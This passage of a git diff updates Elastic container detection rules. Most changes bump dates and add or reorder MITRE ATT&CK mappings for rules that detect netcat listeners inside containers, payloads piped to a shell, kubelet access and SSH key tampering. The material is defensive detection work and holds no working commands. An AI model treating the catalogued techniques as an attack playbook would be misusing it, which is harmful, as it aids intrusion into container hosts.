a/rules/integrations/cloud_defend/discovery_kubelet_pod_discovery_via_builtin_utilities.toml b/rules/integrations/cloud_defend/discovery_kubelet_pod_discovery_via_builtin_utilities.toml index 9e8e35195e7..fc8c6d397c8 100644 --- a/rules/integrations/cloud_defend/discovery_kubelet_pod_discovery_via_builtin_utilities.toml +++ b/rules/integrations/cloud_defend/discovery_kubelet_pod_discovery_via_builtin_utilities.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,6 +86,11 @@ sequence by container.id, user.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" diff --git a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml index 81381ad389b..ef16f2f9eb6 100644 --- a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml +++ b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,15 +94,20 @@ process where host.os.type == "linux" and event.type == "start" and event.action framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml index 5e447e2221b..10cc0ef66c4 100644 --- a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml +++ b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,17 +96,30 @@ any where host.os.type == "linux" and process.interactive == true and container. [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml index 6b685a4acac..55c1dcb3970 100644 --- a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml +++ b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -156,3 +156,16 @@ reference = "https://attack.mitre.org/techniques/T1595/" id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/cloud_defend/execution_container_management_binary_launched_inside_a_container.toml b/rules/integrations/cloud_defend/execution_container_management_binary_launched_inside_a_container.toml index 6a1717f97e5..3ad1999ecd1 100644 --- a/rules/integrations/cloud_defend/execution_container_management_binary_launched_inside_a_container.toml +++ b/rules/integrations/cloud_defend/execution_container_management_binary_launched_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1609/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml index eca6ed47139..2878c5eeeac 100644 --- a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml +++ b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -132,6 +132,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -149,3 +154,21 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml index aa6c4f5a487..545c68ed42e 100644 --- a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml +++ b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,11 +78,6 @@ file.path like ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -93,23 +88,43 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] -name = "Application Layer Protocol" id = "T1071" +name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [rule.threat.tactic] -name = "Defense Evasion" id = "TA0005" +name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml index 4d369ab6944..1b2800b05ca 100644 --- a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml +++ b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -97,6 +97,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml index 8c8ff36688b..28586e1bcca 100644 --- a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml +++ b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,3 +125,34 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[[rule.threat.technique.subtechnique]] +id = "T1048.003" +name = "Exfiltration Over Unencrypted Non-C2 Protocol" +reference = "https://attack.mitre.org/techniques/T1048/003/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml index 929a3fbb945..de03d834e18 100644 --- a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml +++ b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,11 +99,6 @@ sequence by process.parent.entity_id, container.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -114,23 +109,38 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -name = "Application Layer Protocol" id = "T1071" +name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" [rule.threat.tactic] -name = "Defense Evasion" id = "TA0005" +name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml index 1e80e6c6c4e..579b60c02b9 100644 --- a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml +++ b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,3 +105,16 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml index 37ebcaa3c19..4b08510e3c8 100644 --- a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml +++ b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,21 @@ reference = "https://attack.mitre.org/techniques/T1222/002/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml index 674f355202d..d677ad19712 100644 --- a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml +++ b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,45 +117,63 @@ process.parent.executable != null and ( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" - [[rule.threat.technique.subtechnique]] - name = "Lua" - id = "T1059.011" - reference = "https://attack.mitre.org/techniques/T1059/011/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/execution_tool_installation.toml b/rules/integrations/cloud_defend/execution_tool_installation.toml index ad87e634195..a5a4dec9515 100644 --- a/rules/integrations/cloud_defend/execution_tool_installation.toml +++ b/rules/integrations/cloud_defend/execution_tool_installation.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,3 +98,16 @@ reference = "https://attack.mitre.org/techniques/T1072/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml index f2710c97edc..7bbd64a8f65 100644 --- a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml +++ b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,24 +116,39 @@ not process.name in ("apt", "apt-get", "dnf", "microdnf", "yum", "zypper", "tdnf framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" + [[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [[rule.threat.technique]] id = "T1546" @@ -153,21 +168,36 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -191,11 +221,21 @@ id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml index a177a35115c..3da9b6ce39b 100644 --- a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml +++ b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,21 @@ reference = "https://attack.mitre.org/techniques/T1563/001/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml index 4e79c7957c8..92639f5d1fc 100644 --- a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml +++ b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,9 +86,9 @@ process.args like ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" [[rule.threat.technique]] id = "T1053" @@ -101,9 +101,24 @@ name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" [[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" [[rule.threat.technique]] id = "T1546" @@ -115,6 +130,16 @@ id = "T1546.004" name = "Unix Shell Configuration Modification" reference = "https://attack.mitre.org/techniques/T1546/004/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -123,11 +148,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" @@ -138,6 +158,46 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" @@ -156,7 +216,30 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml index 